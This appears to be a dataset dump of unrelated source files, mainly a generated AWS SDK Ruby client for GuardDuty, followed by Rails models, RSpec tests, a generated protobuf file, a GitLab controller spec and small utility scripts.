def list_invitations(params = {}, options = {})
req = build_request(:list_invitations, params)
req.send_request(options)
end
# Lists details about all member accounts for the current GuardDuty
# master account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector the member is associated with.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items you
# want in the response. The default value is 50. The maximum value is
# 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @option params [String] :only_associated
# Specifies whether to only return associated members or to return all
# members (including members who haven't been invited yet or have been
# disassociated).
#
# @return [Types::ListMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListMembersResponse#members #members} => Array<Types::Member>
# * {Types::ListMembersResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_members({
# detector_id: "DetectorId", # required
# max_results: 1,
# next_token: "String",
# only_associated: "String",
# })
#
# @example Response structure
#
# resp.members #=> Array
# resp.members[0].account_id #=> String
# resp.members[0].detector_id #=> String
# resp.members[0].master_id #=> String
# resp.members[0].email #=> String
# resp.members[0].relationship_status #=> String
# resp.members[0].invited_at #=> String
# resp.members[0].updated_at #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListMembers AWS API Documentation
#
# @overload list_members(params = {})
# @param [Hash] params ({})
def list_members(params = {}, options = {})
req = build_request(:list_members, params)
req.send_request(options)
end
# Lists the accounts configured as GuardDuty delegated administrators.
#
# @option params [Integer] :max_results
# The maximum number of results to return in the response.
#
# @option params [String] :next_token
# A token to use for paginating results that are returned in the
# response. Set the value of this parameter to null for the first
# request to a list action. For subsequent calls, use the `NextToken`
# value returned from the previous request to continue listing results
# after the first page.
#
# @return [Types::ListOrganizationAdminAccountsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListOrganizationAdminAccountsResponse#admin_accounts #admin_accounts} => Array<Types::AdminAccount>
# * {Types::ListOrganizationAdminAccountsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_organization_admin_accounts({
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.admin_accounts #=> Array
# resp.admin_accounts[0].admin_account_id #=> String
# resp.admin_accounts[0].admin_status #=> String, one of "ENABLED", "DISABLE_IN_PROGRESS"
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListOrganizationAdminAccounts AWS API Documentation
#
# @overload list_organization_admin_accounts(params = {})
# @param [Hash] params ({})
def list_organization_admin_accounts(params = {}, options = {})
req = build_request(:list_organization_admin_accounts, params)
req.send_request(options)
end
# Returns a list of publishing destinations associated with the
# specified `dectectorId`.
#
# @option params [required, String] :detector_id
# The ID of the detector to retrieve publishing destinations for.
#
# @option params [Integer] :max_results
# The maximum number of results to return in the response.
#
# @option params [String] :next_token
# A token to use for paginating results that are returned in the
# response. Set the value of this parameter to null for the first
# request to a list action. For subsequent calls, use the `NextToken`
# value returned from the previous request to continue listing results
# after the first page.
#
# @return [Types::ListPublishingDestinationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListPublishingDestinationsResponse#destinations #destinations} => Array<Types::Destination>
# * {Types::ListPublishingDestinationsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_publishing_destinations({
# detector_id: "DetectorId", # required
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.destinations #=> Array
# resp.destinations[0].destination_id #=> String
# resp.destinations[0].destination_type #=> String, one of "S3"
# resp.destinations[0].status #=> String, one of "PENDING_VERIFICATION", "PUBLISHING", "UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY", "STOPPED"
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListPublishingDestinations AWS API Documentation
#
# @overload list_publishing_destinations(params = {})
# @param [Hash] params ({})
def list_publishing_destinations(params = {}, options = {})
req = build_request(:list_publishing_destinations, params)
req.send_request(options)
end
# Lists tags for a resource. Tagging is currently supported for
# detectors, finding filters, IP sets, and threat intel sets, with a
# limit of 50 tags per resource. When invoked, this operation returns
# all assigned tags for a given resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) for the given GuardDuty resource.
#
# @return [Types::ListTagsForResourceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListTagsForResourceResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.list_tags_for_resource({
# resource_arn: "GuardDutyArn", # required
# })
#
# @example Response structure
#
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListTagsForResource AWS API Documentation
#
# @overload list_tags_for_resource(params = {})
# @param [Hash] params ({})
def list_tags_for_resource(params = {}, options = {})
req = build_request(:list_tags_for_resource, params)
req.send_request(options)
end
# Lists the ThreatIntelSets of the GuardDuty service specified by the
# detector ID. If you use this operation from a member account, the
# ThreatIntelSets associated with the master account are returned.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the threatIntelSet is associated
# with.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items
# that you want in the response. The default value is 50. The maximum
# value is 50.
#
# @option params [String] :next_token
# You can use this parameter to paginate results in the response. Set
# the value of this parameter to null on your first call to the list
# action. For subsequent calls to the action, fill nextToken in the
# request with the value of NextToken from the previous response to
# continue listing data.
#
# @return [Types::ListThreatIntelSetsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListThreatIntelSetsResponse#threat_intel_set_ids #threat_intel_set_ids} => Array<String>
# * {Types::ListThreatIntelSetsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_threat_intel_sets({
# detector_id: "DetectorId", # required
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.threat_intel_set_ids #=> Array
# resp.threat_intel_set_ids[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListThreatIntelSets AWS API Documentation
#
# @overload list_threat_intel_sets(params = {})
# @param [Hash] params ({})
def list_threat_intel_sets(params = {}, options = {})
req = build_request(:list_threat_intel_sets, params)
req.send_request(options)
end
# Turns on GuardDuty monitoring of the specified member accounts. Use
# this operation to restart monitoring of accounts that you stopped
# monitoring with the `StopMonitoringMembers` operation.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty master account
# associated with the member accounts to monitor.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the GuardDuty member accounts to start
# monitoring.
#
# @return [Types::StartMonitoringMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::StartMonitoringMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.start_monitoring_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/StartMonitoringMembers AWS API Documentation
#
# @overload start_monitoring_members(params = {})
# @param [Hash] params ({})
def start_monitoring_members(params = {}, options = {})
req = build_request(:start_monitoring_members, params)
req.send_request(options)
end
# Stops GuardDuty monitoring for the specified member accounts. Use the
# `StartMonitoringMembers` operation to restart monitoring for those
# accounts.
#
# @option params [required, String] :detector_id
# The unique ID of the detector associated with the GuardDuty master
# account that is monitoring member accounts.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs for the member accounts to stop monitoring.
#
# @return [Types::StopMonitoringMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::StopMonitoringMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.stop_monitoring_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/StopMonitoringMembers AWS API Documentation
#
# @overload stop_monitoring_members(params = {})
# @param [Hash] params ({})
def stop_monitoring_members(params = {}, options = {})
req = build_request(:stop_monitoring_members, params)
req.send_request(options)
end
# Adds tags to a resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) for the GuardDuty resource to apply a
# tag to.
#
# @option params [required, Hash<String,String>] :tags
# The tags to be added to a resource.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.tag_resource({
# resource_arn: "GuardDutyArn", # required
# tags: { # required
# "TagKey" => "TagValue",
# },
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/TagResource AWS API Documentation
#
# @overload tag_resource(params = {})
# @param [Hash] params ({})
def tag_resource(params = {}, options = {})
req = build_request(:tag_resource, params)
req.send_request(options)
end
# Unarchives GuardDuty findings specified by the `findingIds`.
#
# @option params [required, String] :detector_id
# The ID of the detector associated with the findings to unarchive.
#
# @option params [required, Array<String>] :finding_ids
# The IDs of the findings to unarchive.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.unarchive_findings({
# detector_id: "DetectorId", # required
# finding_ids: ["FindingId"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UnarchiveFindings AWS API Documentation
#
# @overload unarchive_findings(params = {})
# @param [Hash] params ({})
def unarchive_findings(params = {}, options = {})
req = build_request(:unarchive_findings, params)
req.send_request(options)
end
# Removes tags from a resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) for the resource to remove tags from.
#
# @option params [required, Array<String>] :tag_keys
# The tag keys to remove from the resource.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.untag_resource({
# resource_arn: "GuardDutyArn", # required
# tag_keys: ["TagKey"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UntagResource AWS API Documentation
#
# @overload untag_resource(params = {})
# @param [Hash] params ({})
def untag_resource(params = {}, options = {})
req = build_request(:untag_resource, params)
req.send_request(options)
end
# Updates the Amazon GuardDuty detector specified by the detectorId.
#
# @option params [required, String] :detector_id
# The unique ID of the detector to update.
#
# @option params [Boolean] :enable
# Specifies whether the detector is enabled or not enabled.
#
# @option params [String] :finding_publishing_frequency
# An enum value that specifies how frequently findings are exported,
# such as to CloudWatch Events.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_detector({
# detector_id: "DetectorId", # required
# enable: false,
# finding_publishing_frequency: "FIFTEEN_MINUTES", # accepts FIFTEEN_MINUTES, ONE_HOUR, SIX_HOURS
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateDetector AWS API Documentation
#
# @overload update_detector(params = {})
# @param [Hash] params ({})
def update_detector(params = {}, options = {})
req = build_request(:update_detector, params)
req.send_request(options)
end
# Updates the filter specified by the filter name.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that specifies the GuardDuty service
# where you want to update a filter.
#
# @option params [required, String] :filter_name
# The name of the filter.
#
# @option params [String] :description
# The description of the filter.
#
# @option params [String] :action
# Specifies the action that is to be applied to the findings that match
# the filter.
#
# @option params [Integer] :rank
# Specifies the position of the filter in the list of current filters.
# Also specifies the order in which this filter is applied to the
# findings.
#
# @option params [Types::FindingCriteria] :finding_criteria
# Represents the criteria to be used in the filter for querying
# findings.
#
# @return [Types::UpdateFilterResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateFilterResponse#name #name} => String
#
# @example Request syntax with placeholder values
#
# resp = client.update_filter({
# detector_id: "DetectorId", # required
# filter_name: "String", # required
# description: "FilterDescription",
# action: "NOOP", # accepts NOOP, ARCHIVE
# rank: 1,
# finding_criteria: {
# criterion: {
# "String" => {
# eq: ["String"],
# neq: ["String"],
# gt: 1,
# gte: 1,
# lt: 1,
# lte: 1,
# equals: ["String"],
# not_equals: ["String"],
# greater_than: 1,
# greater_than_or_equal: 1,
# less_than: 1,
# less_than_or_equal: 1,
# },
# },
# },
# })
#
# @example Response structure
#
# resp.name #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateFilter AWS API Documentation
#
# @overload update_filter(params = {})
# @param [Hash] params ({})
def update_filter(params = {}, options = {})
req = build_request(:update_filter, params)
req.send_request(options)
end
# Marks the specified GuardDuty findings as useful or not useful.
#
# @option params [required, String] :detector_id
# The ID of the detector associated with the findings to update feedback
# for.
#
# @option params [required, Array<String>] :finding_ids
# The IDs of the findings that you want to mark as useful or not useful.
#
# @option params [required, String] :feedback
# The feedback for the finding.
#
# @option params [String] :comments
# Additional feedback about the GuardDuty findings.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_findings_feedback({
# detector_id: "DetectorId", # required
# finding_ids: ["FindingId"], # required
# feedback: "USEFUL", # required, accepts USEFUL, NOT_USEFUL
# comments: "String",
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateFindingsFeedback AWS API Documentation
#
# @overload update_findings_feedback(params = {})
# @param [Hash] params ({})
def update_findings_feedback(params = {}, options = {})
req = build_request(:update_findings_feedback, params)
req.send_request(options)
end
# Updates the IPSet specified by the IPSet ID.
#
# @option params [required, String] :detector_id
# The detectorID that specifies the GuardDuty service whose IPSet you
# want to update.
#
# @option params [required, String] :ip_set_id
# The unique ID that specifies the IPSet that you want to update.
#
# @option params [String] :name
# The unique ID that specifies the IPSet that you want to update.
#
# @option params [String] :location
# The updated URI of the file that contains the IPSet. For example:
# https://s3.us-west-2.amazonaws.com/my-bucket/my-object-key.
#
# @option params [Boolean] :activate
# The updated Boolean value that specifies whether the IPSet is active
# or not.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_ip_set({
# detector_id: "DetectorId", # required
# ip_set_id: "String", # required
# name: "Name",
# location: "Location",
# activate: false,
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateIPSet AWS API Documentation
#
# @overload update_ip_set(params = {})
# @param [Hash] params ({})
def update_ip_set(params = {}, options = {})
req = build_request(:update_ip_set, params)
req.send_request(options)
end
# Updates the delegated administrator account with the values provided.
#
# @option params [required, String] :detector_id
# The ID of the detector to update the delegated administrator for.
#
# @option params [required, Boolean] :auto_enable
# Indicates whether to automatically enable member accounts in the
# organization.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_organization_configuration({
# detector_id: "DetectorId", # required
# auto_enable: false, # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateOrganizationConfiguration AWS API Documentation
#
# @overload update_organization_configuration(params = {})
# @param [Hash] params ({})
def update_organization_configuration(params = {}, options = {})
req = build_request(:update_organization_configuration, params)
req.send_request(options)
end
# Updates information about the publishing destination specified by the
# `destinationId`.
#
# @option params [required, String] :detector_id
# The ID of the detector associated with the publishing destinations to
# update.
#
# @option params [required, String] :destination_id
# The ID of the publishing destination to update.
#
# @option params [Types::DestinationProperties] :destination_properties
# A `DestinationProperties` object that includes the `DestinationArn`
# and `KmsKeyArn` of the publishing destination.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_publishing_destination({
# detector_id: "DetectorId", # required
# destination_id: "String", # required
# destination_properties: {
# destination_arn: "String",
# kms_key_arn: "String",
# },
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdatePublishingDestination AWS API Documentation
#
# @overload update_publishing_destination(params = {})
# @param [Hash] params ({})
def update_publishing_destination(params = {}, options = {})
req = build_request(:update_publishing_destination, params)
req.send_request(options)
end
# Updates the ThreatIntelSet specified by the ThreatIntelSet ID.
#
# @option params [required, String] :detector_id
# The detectorID that specifies the GuardDuty service whose
# ThreatIntelSet you want to update.
#
# @option params [required, String] :threat_intel_set_id
# The unique ID that specifies the ThreatIntelSet that you want to
# update.
#
# @option params [String] :name
# The unique ID that specifies the ThreatIntelSet that you want to
# update.
#
# @option params [String] :location
# The updated URI of the file that contains the ThreateIntelSet. For
# example: https://s3.us-west-2.amazonaws.com/my-bucket/my-object-key.
#
# @option params [Boolean] :activate
# The updated Boolean value that specifies whether the ThreateIntelSet
# is active or not.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_threat_intel_set({
# detector_id: "DetectorId", # required
# threat_intel_set_id: "String", # required
# name: "Name",
# location: "Location",
# activate: false,
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/UpdateThreatIntelSet AWS API Documentation
#
# @overload update_threat_intel_set(params = {})
# @param [Hash] params ({})
def update_threat_intel_set(params = {}, options = {})
req = build_request(:update_threat_intel_set, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-guardduty'
context[:gem_version] = '1.35.1'
Seahorse::Client::Request.new(handlers, context)
end
# @api private
# @deprecated
def waiter_names
[]
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 42.800683 | 177 | 0.669282 |
ed0c84b1b6a4532a0a5784ff56dee9383fe6103c | 169 | require "rails_helper"
RSpec.describe Resource, type: :model do
it { is_expected.to validate_presence_of :title }
it { is_expected.to belong_to :resourcetype }
end
| 24.142857 | 51 | 0.769231 |
62e17f569b1c06d387f7839552c0b80a83972822 | 1,878 | # encoding: utf-8
##
# This file is auto-generated. DO NOT EDIT!
#
require 'protobuf'
##
# Imports
#
require 'google/protobuf/descriptor.pb'
module Google
module Protobuf
module Compiler
::Protobuf::Optionable.inject(self) { ::Google::Protobuf::FileOptions }
##
# Message Classes
#
class Version < ::Protobuf::Message; end
class CodeGeneratorRequest < ::Protobuf::Message; end
class CodeGeneratorResponse < ::Protobuf::Message
class Feature < ::Protobuf::Enum
define :FEATURE_NONE, 0
define :FEATURE_PROTO3_OPTIONAL, 1
end
class File < ::Protobuf::Message; end
end
##
# File Options
#
set_option :java_package, "com.google.protobuf.compiler"
set_option :java_outer_classname, "PluginProtos"
set_option :go_package, "google.golang.org/protobuf/types/pluginpb"
##
# Message Fields
#
class Version
optional :int32, :major, 1
optional :int32, :minor, 2
optional :int32, :patch, 3
optional :string, :suffix, 4
end
class CodeGeneratorRequest
repeated :string, :file_to_generate, 1
optional :string, :parameter, 2
repeated ::Google::Protobuf::FileDescriptorProto, :proto_file, 15
optional ::Google::Protobuf::Compiler::Version, :compiler_version, 3
end
class CodeGeneratorResponse
class File
optional :string, :name, 1
optional :string, :insertion_point, 2
optional :string, :content, 15
optional ::Google::Protobuf::GeneratedCodeInfo, :generated_code_info, 16
end
optional :string, :error, 1
optional :uint64, :supported_features, 2
repeated ::Google::Protobuf::Compiler::CodeGeneratorResponse::File, :file, 15
end
end
end
end
| 23.475 | 85 | 0.625133 |
ac9ada6a29fd3fa5ed7664963ae242a2035a9b2c | 3,513 | class User < ApplicationRecord
has_many :microposts, dependent: :destroy
has_many :active_relationships, class_name: "Relationship",
foreign_key: "follower_id",
dependent: :destroy
has_many :passive_relationships, class_name: "Relationship",
foreign_key: "followed_id",
dependent: :destroy
has_many :following, through: :active_relationships, source: :followed
has_many :followers, through: :passive_relationships, source: :follower
attr_accessor :remember_token, :activation_token, :reset_token
before_save :downcase_email
before_create :create_activation_digest
validates :name, presence: true, length: { maximum: 50 }
VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-.]+\.[a-z]+\z/i
validates :email, presence: true, length: { maximum: 255 },
format: { with: VALID_EMAIL_REGEX },
uniqueness: { case_sensitive: false }
has_secure_password
validates :password, presence: true, length: { minimum: 6 }, allow_nil: true
# Returns the hash digest of the given string.
def User.digest(string)
cost = ActiveModel::SecurePassword.min_cost ? BCrypt::Engine::MIN_COST :
BCrypt::Engine.cost
BCrypt::Password.create(string, cost: cost)
end
# Returns a random token.
def User.new_token
SecureRandom.urlsafe_base64
end
def remember
self.remember_token = User.new_token
update_attribute(:remember_digest, User.digest(remember_token))
end
# Returns true if the given token matches the digest.
def authenticated?(attribute, token)
digest = send("#{attribute}_digest")
return false if digest.nil?
BCrypt::Password.new(digest).is_password?(token)
end
# Forgets a user.
def forget
update_attribute(:remember_digest, nil)
end
# Activates an account.
def activate
update_columns(activated: true, activated_at: Time.zone.now)
end
# Sends activation email.
def send_activation_email
UserMailer.account_activation(self).deliver_now
end
# Sets the password reset attributes.
def create_reset_digest
self.reset_token = User.new_token
update_columns(reset_digest: User.digest(reset_token), reset_sent_at: Time.zone.now)
end
# Sends password reset email.
def send_password_reset_email
UserMailer.password_reset(self).deliver_now
end
# Returns true if a password reset has expired.
def password_reset_expired?
reset_sent_at < 2.hours.ago
end
# Defines a proto-feed.
# Returns a user's status feed.
def feed
following_ids = "SELECT followed_id FROM relationships
WHERE follower_id = :user_id"
Micropost.where("user_id IN (#{following_ids})
OR user_id = :user_id", user_id: id)
end
# Follows a user.
def follow(other_user)
following << other_user
end
# Unfollows a user.
def unfollow(other_user)
following.delete(other_user)
end
# Returns true if the current user is following the other user.
def following?(other_user)
following.include?(other_user)
end
private
# Converts email to all lower-case.
def downcase_email
email.downcase!
end
# Creates and assigns the activation token and digest.
def create_activation_digest
self.activation_token = User.new_token
self.activation_digest = User.digest(activation_token)
end
end | 30.284483 | 89 | 0.679192 |
39d819b4bdf96074c61cf222915c9936b0baef7d | 367 | module Pushcar
module Transport
class Sse < Base
register :sse
def content_type
"application/x-dom-event-stream"
end
def write(data)
renderer.call ["Event: message\n" +
data.split("\n").map { |datum| "data: #{datum}\n" }.join +
"\n"]
end
end
end
end | 21.588235 | 81 | 0.482289 |
f80e8c120784b1f158ddcf549166f193c9c1af7f | 661 | def btr(c, x, y, i, j)
return '' if i < 1 || j < 1
return btr(c, x, y, i - 1, j - 1) + x[i - 1] if x[i - 1] == y[j - 1]
return btr(c, x, y, i, j - 1) if c[i][j - 1] > c[i - 1][j]
btr(c, x, y, i - 1, j)
end
File.open(ARGV[0]).each_line do |line|
line.chomp!
next if line.empty?
x, y = line.split(';')
c = Array.new(x.length + 1) { |_| Array.new(y.length + 1) { |_| 0 } }
x.each_char.with_index do |i, ix|
y.each_char.with_index do |j, jx|
if i == j
c[ix + 1][jx + 1] = c[ix][jx] + 1
else
c[ix + 1][jx + 1] = [c[ix + 1][jx], c[ix][jx + 1]].max
end
end
end
puts btr(c, x, y, x.length, y.length)
end
| 27.541667 | 71 | 0.476551 |
ed44ad9b0ae21dd9453b40edef04f9ad38cc90be | 597 | # == Schema Information
#
# Table name: transactions
#
# id :bigint not null, primary key
# user_id :integer not null
# transaction_type :string not null
# created_at :datetime not null
# updated_at :datetime not null
# asset_id :integer
# quantity :integer
# cost_per_share :float
# transaction_amount :float
# ticker :string
#
class Transaction < ApplicationRecord
validates :user_id, :transaction_type, :transaction_amount, presence: true
end
| 27.136364 | 78 | 0.577889 |
ac93393ac3af45bfc902e7a98d0359a577d74afb | 6,917 | require 'spec_helper'
describe Projects::MergeRequests::CreationsController do
let(:project) { create(:project, :repository) }
let(:user) { project.owner }
let(:fork_project) { create(:forked_project_with_submodules) }
let(:get_diff_params) do
{
namespace_id: fork_project.namespace.to_param,
project_id: fork_project,
merge_request: {
source_branch: 'remove-submodule',
target_branch: 'master'
}
}
end
before do
fork_project.add_maintainer(user)
Projects::ForkService.new(project, user).execute(fork_project)
sign_in(user)
end
describe 'GET new' do
context 'merge request that removes a submodule' do
it 'renders new merge request widget template' do
get :new, params: get_diff_params
expect(response).to be_success
end
end
context 'merge request with some commits' do
render_views
let(:large_diff_params) do
{
namespace_id: fork_project.namespace.to_param,
project_id: fork_project,
merge_request: {
source_branch: 'master',
target_branch: 'fix'
}
}
end
describe 'with artificial limits' do
before do
# Load MergeRequestdiff so stub_const won't override it with its own definition
# See https://github.com/rspec/rspec-mocks/issues/1079
stub_const("#{MergeRequestDiff}::COMMITS_SAFE_SIZE", 2)
end
it 'limits total commits' do
get :new, params: large_diff_params
expect(response).to be_success
total = assigns(:total_commit_count)
expect(assigns(:commits)).to be_an Array
expect(total).to be > 0
expect(assigns(:hidden_commit_count)).to be > 0
expect(response).to have_gitlab_http_status(200)
expect(response.body).to match %r(<span class="commits-count">2 commits</span>)
end
end
it 'shows total commits' do
get :new, params: large_diff_params
expect(response).to be_success
total = assigns(:total_commit_count)
expect(assigns(:commits)).to be_an Array
expect(total).to be > 0
expect(assigns(:hidden_commit_count)).to eq(0)
expect(response).to have_gitlab_http_status(200)
expect(response.body).to match %r(<span class="commits-count">#{total} commits</span>)
end
end
end
describe 'GET diffs' do
context 'when merge request cannot be created' do
it 'does not assign diffs var' do
allow_any_instance_of(MergeRequest).to receive(:can_be_created).and_return(false)
get :diffs, params: get_diff_params.merge(format: 'json')
expect(response).to be_success
expect(assigns[:diffs]).to be_nil
end
end
end
describe 'GET pipelines' do
before do
create(:ci_pipeline, sha: fork_project.commit('remove-submodule').id,
ref: 'remove-submodule',
project: fork_project)
end
it 'renders JSON including serialized pipelines' do
get :pipelines, params: get_diff_params.merge(format: 'json')
expect(response).to be_ok
expect(json_response).to have_key 'pipelines'
expect(json_response['pipelines']).not_to be_empty
end
end
describe 'GET diff_for_path' do
def diff_for_path(extra_params = {})
params = {
namespace_id: project.namespace.to_param,
project_id: project,
format: 'json'
}
get :diff_for_path, params: params.merge(extra_params)
end
let(:existing_path) { 'files/ruby/feature.rb' }
context 'when both branches are in the same project' do
it 'disables diff notes' do
diff_for_path(old_path: existing_path, new_path: existing_path, merge_request: { source_branch: 'feature', target_branch: 'master' })
expect(assigns(:diff_notes_disabled)).to be_truthy
end
it 'only renders the diffs for the path given' do
expect(controller).to receive(:render_diff_for_path).and_wrap_original do |meth, diffs|
expect(diffs.diff_files.map(&:new_path)).to contain_exactly(existing_path)
meth.call(diffs)
end
diff_for_path(old_path: existing_path, new_path: existing_path, merge_request: { source_branch: 'feature', target_branch: 'master' })
end
end
context 'when the source branch is in a different project to the target' do
let(:other_project) { create(:project, :repository) }
before do
other_project.add_maintainer(user)
end
context 'when the path exists in the diff' do
it 'disables diff notes' do
diff_for_path(old_path: existing_path, new_path: existing_path, merge_request: { source_project: other_project, source_branch: 'feature', target_branch: 'master' })
expect(assigns(:diff_notes_disabled)).to be_truthy
end
it 'only renders the diffs for the path given' do
expect(controller).to receive(:render_diff_for_path).and_wrap_original do |meth, diffs|
expect(diffs.diff_files.map(&:new_path)).to contain_exactly(existing_path)
meth.call(diffs)
end
diff_for_path(old_path: existing_path, new_path: existing_path, merge_request: { source_project: other_project, source_branch: 'feature', target_branch: 'master' })
end
end
context 'when the path does not exist in the diff' do
before do
diff_for_path(old_path: 'files/ruby/nopen.rb', new_path: 'files/ruby/nopen.rb', merge_request: { source_project: other_project, source_branch: 'feature', target_branch: 'master' })
end
it 'returns a 404' do
expect(response).to have_gitlab_http_status(404)
end
end
end
end
describe 'GET #branch_to' do
before do
allow(Ability).to receive(:allowed?).and_call_original
end
it 'fetches the commit if a user has access' do
expect(Ability).to receive(:allowed?).with(user, :read_project, project) { true }
get :branch_to,
params: {
namespace_id: fork_project.namespace,
project_id: fork_project,
target_project_id: project.id,
ref: 'master'
}
expect(assigns(:commit)).not_to be_nil
expect(response).to have_gitlab_http_status(200)
end
it 'does not load the commit when the user cannot read the project' do
expect(Ability).to receive(:allowed?).with(user, :read_project, project) { false }
get :branch_to,
params: {
namespace_id: fork_project.namespace,
project_id: fork_project,
target_project_id: project.id,
ref: 'master'
}
expect(assigns(:commit)).to be_nil
expect(response).to have_gitlab_http_status(200)
end
end
end
| 32.32243 | 190 | 0.649559 |
33adae12eada553893fb34df43af9aa81918c32d | 809 | module LanguageServer
module Protocol
module Interface
#
# Show message request client capabilities
#
class ShowMessageRequestClientCapabilities
def initialize(message_action_item: nil)
@attributes = {}
@attributes[:messageActionItem] = message_action_item if message_action_item
@attributes.freeze
end
#
# Capabilities specific to the `MessageActionItem` type.
#
# @return [{ additionalPropertiesSupport?: boolean; }]
def message_action_item
attributes.fetch(:messageActionItem)
end
attr_reader :attributes
def to_hash
attributes
end
def to_json(*args)
to_hash.to_json(*args)
end
end
